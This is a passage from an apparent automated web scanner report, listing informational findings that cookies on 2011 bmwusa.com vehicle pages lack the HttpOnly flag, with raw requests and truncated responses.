Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:04 GMT;path=/
Content-Length: 214443


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.287. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:28 GMT;path=/
Content-Length: 202171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.288. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:12 GMT;path=/
Content-Length: 214705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.289. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:04 GMT;path=/
Content-Length: 227207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.290. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:10:42 GMT;path=/
Content-Length: 227208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.291. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:01 GMT;path=/
Content-Length: 215752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.292. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:25 GMT;path=/
Content-Length: 215753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.293. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/5explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/5explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:39 GMT;path=/
Content-Length: 180004


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.294. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/5granturismoexplore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/5granturismoexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:42 GMT;path=/
Content-Length: 180239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.295. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:31 GMT;path=/
Content-Length: 202396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.296. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:36 GMT;path=/
Content-Length: 202156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.297. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:36 GMT;path=/
Content-Length: 212832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.298. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:24 GMT;path=/
Content-Length: 212833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.299. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:27:21 GMT;path=/
Content-Length: 227187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.300. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
